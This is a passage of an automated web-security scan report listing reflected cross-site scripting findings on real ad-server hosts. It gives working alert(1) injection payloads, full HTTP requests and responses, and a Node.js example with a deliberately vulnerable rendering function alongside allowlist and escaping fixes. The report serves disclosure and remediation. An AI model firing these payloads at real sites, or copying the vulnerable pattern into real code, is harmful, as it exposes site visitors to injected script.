<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-33363457_1305034513","http://ad.doubleclick.net/adjc6a8a'-alert(1)-'d70f51146c9/ns.slashgear/general;net=ns;u=,ns-33363457_1305034513,11f8f328940989e,Miscellaneous,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;click=
...[SNIP]...

4.45. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d6cb'-alert(1)-'23ce3502b9c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 2 is the site name (ns.slashgear here); the application should accept only letters, digits, '.', '_' and '-' in it and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside that set) rather than copied verbatim.

Request

GET /cmadj/ns.slashgear6d6cb'-alert(1)-'23ce3502b9c/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253;env=ifr;ord1=461219;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:16 GMT
Connection: close
Content-Length: 7899

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-73419127_1305034516","http://ad.doubleclick.net/adj/ns.slashgear6d6cb'-alert(1)-'23ce3502b9c/general;net=ns;u=,ns-73419127_1305034516,11f8f328940989e,Miscellaneous,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;click=http://adclic
...[SNIP]...

4.46. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2c4b'-alert(1)-'3beeb056928 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 3 is the section name (general here); the application should accept only letters, digits, '.', '_' and '-' in it and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside that set) rather than copied verbatim.

Request

GET /cmadj/ns.slashgear/generalb2c4b'-alert(1)-'3beeb056928;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253;env=ifr;ord1=461219;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:21 GMT
Connection: close
Content-Length: 7899

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-26243134_1305034521","http://ad.doubleclick.net/adj/ns.slashgear/generalb2c4b'-alert(1)-'3beeb056928;net=ns;u=,ns-26243134_1305034521,11f8f328940989e,Miscellaneous,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;click=http://adclick.g.doub
...[SNIP]...

4.47. http://a.collective-media.net/cmadj/ns.slashgear/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f86'-alert(1)-'bf7390dfd76 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. ppos is a placement flag with a small set of legitimate values (atf here); the application should match it against that fixed list and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside the letters, digits, '.', '_' and '-') rather than copied verbatim.

Request

GET /cmadj/ns.slashgear/general;ppos=b0f86'-alert(1)-'bf7390dfd76 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:23 GMT
Connection: close
Content-Length: 7320

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
dAttachAd("ns-34740352_1305034463","http://ad.doubleclick.net/adj/ns.slashgear/general;net=ns;u=,ns-34740352_1305034463,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=b0f86'-alert(1)-'bf7390dfd76;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.48. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df7fe'-alert(1)-'4217b4f4195 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 1 is the ad-call type: the response shows cmadj being rewritten to adj with the appended payload carried along, so the handler transforms this segment instead of matching it. It should be matched against the fixed list of supported ad-call types and any other request rejected. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside the letters, digits, '.', '_' and '-') rather than copied verbatim.

Request

GET /cmadjdf7fe'-alert(1)-'4217b4f4195/q1.philly/news;sz=300x600;net=q1;ord=[timestamp];ord1=158490;cmpgurl=http%253A//www.philly.com/philly/news/nation_world/121548659.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:12:09 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:12:09 GMT
Content-Length: 7641

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-37153453_1305033129","http://ad.doubleclick.net/adjdf7fe'-alert(1)-'4217b4f4195/q1.philly/news;net=q1;u=,q1-37153453_1305033129,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-c
...[SNIP]...

4.49. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a28f1'-alert(1)-'72417d38acc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 2 is the site name (q1.philly here); the application should accept only letters, digits, '.', '_' and '-' in it and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside that set) rather than copied verbatim.

Request

GET /cmadj/q1.phillya28f1'-alert(1)-'72417d38acc/news;sz=300x600;net=q1;ord=[timestamp];ord1=158490;cmpgurl=http%253A//www.philly.com/philly/news/nation_world/121548659.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:12:10 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:12:10 GMT
Content-Length: 7631

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-5554184_1305033130","http://ad.doubleclick.net/adj/q1.phillya28f1'-alert(1)-'72417d38acc/news;net=q1;u=,q1-5554184_1305033130,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;
...[SNIP]...

4.50. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12520'-alert(1)-'7118891472a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 3 is the section name (news here); the application should accept only letters, digits, '.', '_' and '-' in it and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside that set) rather than copied verbatim.

Request

GET /cmadj/q1.philly/news12520'-alert(1)-'7118891472a;sz=300x600;net=q1;ord=[timestamp];ord1=158490;cmpgurl=http%253A//www.philly.com/philly/news/nation_world/121548659.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:12:11 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:12:11 GMT
Content-Length: 7633

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-47912472_1305033131","http://ad.doubleclick.net/adj/q1.philly/news12520'-alert(1)-'7118891472a;net=q1;u=,q1-47912472_1305033131,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=
...[SNIP]...

4.51. http://a.collective-media.net/cmadj/q1.philly/news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecbe8'-alert(1)-'79f52d6e60a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. sz is an ad size (300x600 here); the application should match it against the list of supported sizes, or at least the pattern digits-x-digits, and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside the letters, digits, '.', '_' and '-') rather than copied verbatim.

Request

GET /cmadj/q1.philly/news;sz=ecbe8'-alert(1)-'79f52d6e60a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:11:54 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:11:54 GMT
Content-Length: 7611

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
s;net=q1;u=,q1-48677486_1305033114,11f8f328940989e,none,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=ecbe8'-alert(1)-'79f52d6e60a;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=q1.sports_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.wea
...[SNIP]...
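Findings 4.41 to 4.51 share one sink: a token from the request path (the ad-call type, site, section, ppos or sz) is concatenated into a single-quoted JavaScript string literal that the cmadj script later writes out as an HTML script element. The Node.js script below is an added example, not Collective Media's code, which is not available; renderAdScript() is a hypothetical reconstruction of the observed output, the TOKEN pattern is an assumption based on the values seen in this report (ns.knowyourmobile, general, atf, 728x90), and the mini-lexer is only good enough for this template. It reproduces the breakout with the 4.41 payload, shows the allowlist fix, and shows why escaping only the outer JavaScript layer is not sufficient for this nested context.

```javascript
// Added example (not Collective Media's code): models the cmadj response seen in
// findings 4.41-4.51, where path tokens land inside a single-quoted JS string
// literal that document.write()s an ad-call <script>. Runs under Node.js.

// Hypothetical reconstruction of the observed output. Vulnerable on purpose:
// site, section, ppos and sz are concatenated into the literal unmodified.
function renderAdScript(site, section, ppos, sz) {
  return "document.write('<scr'+'ipt language=\"Javascript\">" +
    "CollectiveMedia.createAndAttachAd(\"ns-1_0\",\"http://ad.doubleclick.net/adj/" +
    site + "/" + section + ";ppos=" + ppos + ";sz=" + sz +
    "?\",\"0\",\"0\",false);</scr'+'ipt>');";
}

// Fix 1 (preferred): every value observed in the report is a short token such as
// ns.knowyourmobile, general, atf or 728x90. Allowlist the character set and
// reject everything else before the value reaches any output context.
const TOKEN = /^[A-Za-z0-9._-]{1,64}$/; // assumption: widest set the real tokens need

function renderAdScriptSafe(site, section, ppos, sz) {
  for (const v of [site, section, ppos, sz]) {
    if (!TOKEN.test(v)) throw new Error("rejected ad parameter " + JSON.stringify(v));
  }
  return renderAdScript(site, section, ppos, sz);
}

// Fix 2 (fallback): \xHH / \uHHHH-escape everything outside a safe set so that no
// character can terminate the OUTER JS literal. See writtenHtml() for its limit.
function escapeForJsLiteral(s) {
  return s.replace(/[^A-Za-z0-9 ._:\/;=,?&%-]/g, c => {
    const cp = c.charCodeAt(0);
    return cp < 0x100 ? "\\x" + cp.toString(16).padStart(2, "0")
                      : "\\u" + cp.toString(16).padStart(4, "0");
  });
}

function renderAdScriptEscaped(site, section, ppos, sz) {
  return renderAdScript(...[site, section, ppos, sz].map(escapeForJsLiteral));
}

// Minimal lexer for this template: splits the rendered script into single-quoted
// literals and the code between them, honouring backslash escapes.
function splitSingleQuoted(src) {
  const parts = [];
  let i = 0;
  while (i < src.length) {
    const open = src.indexOf("'", i);
    if (open === -1) { parts.push({ code: src.slice(i) }); break; }
    if (open > i) parts.push({ code: src.slice(i, open) });
    let j = open + 1, lit = "";
    while (j < src.length && src[j] !== "'") {
      if (src[j] === "\\") { lit += src.slice(j, j + 2); j += 2; } else { lit += src[j++]; }
    }
    parts.push({ literal: lit });
    i = j + 1;
  }
  return parts;
}

// Code that ended up OUTSIDE every string literal. For a clean render this is just
// "document.write(++);"; anything more runs in the ad server's origin.
function codeOutsideLiterals(src) {
  return splitSingleQuoted(src).filter(p => "code" in p).map(p => p.code).join("");
}

// What document.write() actually receives: the literals with \xHH decoded. This is
// the NEXT parsing layer, where a "-based payload attacks createAndAttachAd("...").
function writtenHtml(src) {
  return splitSingleQuoted(src).filter(p => "literal" in p).map(p =>
    p.literal.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
  ).join("");
}

if (typeof require !== "undefined" && require.main === module) {
  const quotePayload = "15b2d'-alert(1)-'fe3576fbb9c"; // payload from finding 4.41
  console.log(codeOutsideLiterals(renderAdScript("ns.knowyourmobile" + quotePayload, "general", "atf", "728x90")));
  try { renderAdScriptSafe("ns.knowyourmobile" + quotePayload, "general", "atf", "728x90"); }
  catch (e) { console.log(e.message); }
  console.log(writtenHtml(renderAdScriptEscaped("ns.knowyourmobile", "general", 'x"-alert(1)-"y', "728x90")));
}
```

Run it with node to see the three outputs: the -alert(1)- that escaped the literal, the allowlist rejection, and a double-quote payload surviving into the written HTML, where it closes the inner createAndAttachAd("...") string. That last output is why the allowlist is the primary fix for this sink: correct output encoding would have to be applied innermost layer first (URL, then the inner JavaScript string, then the outer one), and getting any one of them wrong reopens the hole.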

4.52. http://ad.bnmla.com/serve [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45c7"><script>alert(1)</script>ea258321cd6 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=563&zid=3621&aid=30790&cid=506a45c7"><script>alert(1)</script>ea258321cd6&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253f HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
